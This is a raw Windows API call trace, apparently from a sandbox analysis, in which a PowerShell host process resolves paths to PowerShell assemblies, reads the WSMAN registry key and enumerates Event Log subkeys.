	[0185.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.024] VirtualQuery (in: lpAddress=0x1bb570, lpBuffer=0x1bc430, dwLength=0x30 | out: lpBuffer=0x1bc430*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.025] VirtualQuery (in: lpAddress=0x1bb600, lpBuffer=0x1bc4c0, dwLength=0x30 | out: lpBuffer=0x1bc4c0*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.026] VirtualQuery (in: lpAddress=0x1bbd80, lpBuffer=0x1bcc40, dwLength=0x30 | out: lpBuffer=0x1bcc40*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.028] VirtualQuery (in: lpAddress=0x1bbd80, lpBuffer=0x1bcc40, dwLength=0x30 | out: lpBuffer=0x1bcc40*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0187.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1bd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0187.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1bd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0188.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0188.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0189.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0189.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1bd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0189.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1bd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0189.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1bd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0189.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1bd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0200.799] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0200.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.799] CoTaskMemFree (pv=0x2b58c0) 
	[0200.800] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0200.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.800] CoTaskMemFree (pv=0x2b58c0) 
	[0200.802] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0200.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.802] CoTaskMemFree (pv=0x2b58c0) 
	[0200.803] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0200.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.803] CoTaskMemFree (pv=0x2b58c0) 
	[0200.813] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0200.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.813] CoTaskMemFree (pv=0x2b58c0) 
	[0200.818] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0200.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.818] CoTaskMemFree (pv=0x2b58c0) 
	[0200.819] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0200.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.819] CoTaskMemFree (pv=0x2b58c0) 
	[0200.834] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd548 | out: phkResult=0x1bd548*=0x2e8) returned 0x0
	[0201.012] RegQueryInfoKeyW (in: hKey=0x2e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1bd44c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1bd448, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1bd44c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1bd448*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0201.012] CoTaskMemFree (pv=0x0) 
	[0201.013] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0201.013] RegEnumValueW (in: hKey=0x2e8, dwIndex=0x0, lpValueName=0x2989c0, lpcchValueName=0x1bd4f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1bd4f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0201.013] CoTaskMemFree (pv=0x2989c0) 
	[0201.013] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0201.013] RegEnumValueW (in: hKey=0x2e8, dwIndex=0x1, lpValueName=0x2989c0, lpcchValueName=0x1bd4f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1bd4f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0201.013] CoTaskMemFree (pv=0x2989c0) 
	[0201.013] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0201.013] RegEnumValueW (in: hKey=0x2e8, dwIndex=0x2, lpValueName=0x2989c0, lpcchValueName=0x1bd4f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1bd4f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0201.013] CoTaskMemFree (pv=0x2989c0) 
	[0201.015] RegQueryValueExW (in: hKey=0x2e8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1bd4dc, lpData=0x0, lpcbData=0x1bd4d8*=0x0 | out: lpType=0x1bd4dc*=0x1, lpData=0x0, lpcbData=0x1bd4d8*=0x8) returned 0x0
	[0201.015] CoTaskMemAlloc (cb=0xc) returned 0x1b7a9750
	[0201.015] RegQueryValueExW (in: hKey=0x2e8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1bd4ac, lpData=0x1b7a9750, lpcbData=0x1bd4a8*=0x8 | out: lpType=0x1bd4ac*=0x1, lpData="2.0", lpcbData=0x1bd4a8*=0x8) returned 0x0
	[0203.718] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd498 | out: phkResult=0x1bd498*=0x308) returned 0x0
	[0203.718] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1bd39c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1bd398, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1bd39c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1bd398*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.718] CoTaskMemFree (pv=0x0) 
	[0203.718] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0203.718] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x2989c0, lpcchValueName=0x1bd448, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1bd448, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.718] CoTaskMemFree (pv=0x2989c0) 
	[0203.718] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0203.718] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0x2989c0, lpcchValueName=0x1bd448, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1bd448, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.718] CoTaskMemFree (pv=0x2989c0) 
	[0203.718] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0203.718] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0x2989c0, lpcchValueName=0x1bd448, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1bd448, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.718] CoTaskMemFree (pv=0x2989c0) 
	[0203.718] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1bd42c, lpData=0x0, lpcbData=0x1bd428*=0x0 | out: lpType=0x1bd42c*=0x1, lpData=0x0, lpcbData=0x1bd428*=0x8) returned 0x0
	[0203.718] CoTaskMemAlloc (cb=0xc) returned 0x1b7a95b0
	[0203.718] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1bd3fc, lpData=0x1b7a95b0, lpcbData=0x1bd3f8*=0x8 | out: lpType=0x1bd3fc*=0x1, lpData="2.0", lpcbData=0x1bd3f8*=0x8) returned 0x0
	[0203.719] CoTaskMemFree (pv=0x1b7a95b0) 
	[0203.720] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0203.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.720] CoTaskMemFree (pv=0x2b58c0) 
	[0204.238] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0204.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.239] CoTaskMemFree (pv=0x2b58c0) 
	[0204.244] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4c8 | out: phkResult=0x1bd4c8*=0x30c) returned 0x0
	[0204.250] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1bd43c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1bd438, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1bd43c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1bd438*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.250] CoTaskMemFree (pv=0x0) 
	[0204.251] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0204.251] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x2989c0, lpcchName=0x1bd4c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1bd4c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.252] CoTaskMemFree (pv=0x2989c0) 
	[0204.253] CoTaskMemFree (pv=0x0) 
	[0204.253] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0204.253] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x2989c0, lpcchName=0x1bd4c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1bd4c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.254] CoTaskMemFree (pv=0x2989c0) 
	[0204.254] CoTaskMemFree (pv=0x0) 
	[0204.255] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0204.255] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x2989c0, lpcchName=0x1bd4c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1bd4c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.256] CoTaskMemFree (pv=0x2989c0) 
	[0204.256] CoTaskMemFree (pv=0x0) 
	[0204.256] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0204.256] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x2989c0, lpcchName=0x1bd4c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1bd4c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.257] CoTaskMemFree (pv=0x2989c0) 
	[0204.257] CoTaskMemFree (pv=0x0) 
